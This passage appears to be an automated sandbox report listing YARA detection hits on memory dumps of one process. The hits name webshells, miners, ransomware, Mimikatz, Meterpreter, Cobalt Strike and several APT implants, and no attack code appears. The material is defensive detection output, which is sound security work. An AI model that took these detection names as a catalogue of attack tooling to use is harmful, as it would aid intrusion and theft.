                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CVE_2018_4878_0day_ITW, Description: unknown, Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, Author: unknown
                                                                                                                              • Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth)
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Buran, Description: Yara detected Buran Ransomware, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Gocoder_3, Description: Yara detected Gocoder ransomware, Source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6347949598.0000028BD6FAA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Cute, Description: Yara detected Cute Ransomware, Source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6327648470.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Trojan_Win32_PlaKeylog_B, Description: Keylogger component, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Microsoft
                                                                                                                              • Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: hacktool_macos_keylogger_logkext, Description: LogKext is an open source keylogger for Mac OS X, a product of FSB software., Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, Author: @mimeframe
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: HackTool_Samples, Description: Hacktool, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: unknown
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: MirageStrings, Description: Mirage Identifying Strings, Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, Author: Seth Hardy
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_generic_eval, Description: Generic PHP webshell which uses any eval/exec function in the same line with user input, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: ChinaChopper_Generic, Description: China Chopper Webshells - PHP and ASPX, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_mock, Description: Yara detected Mock Ransomware, Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: USG
                                                                                                                              • Rule: IMPLANT_5_v3, Description: XTunnel Implant by APT28, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: US CERT
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_NoCry, Description: Yara detected NoCry Ransomware, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: malware_red_leaves_memory, Description: Red Leaves C&C left in memory, use with Volatility / Rekall, Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, Author: David Cannings
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter
                                                                                                                              • Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_EvilGnomeRC5Key, Description: Yara detected Linux EvilGnome RC5 key, Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6299135359.0000028BD5FE4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
                                                                                                                              • Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: TA17_293A_malware_1, Description: inveigh pen testing tools & related artifacts, Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, Author: US-CERT Code Analysis Team (modified by Florian Roth)
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Vidar, Description: Yara detected Vidar stealer, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_ByteLocker, Description: Yara detected ByteLocker Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Artemon, Description: Yara detected Artemon Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_lazparking, Description: Yara detected LazParking Ransomware, Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6349322522.0000028BD67F0000.00000004.00000001.sdmp, Author: Joe Security
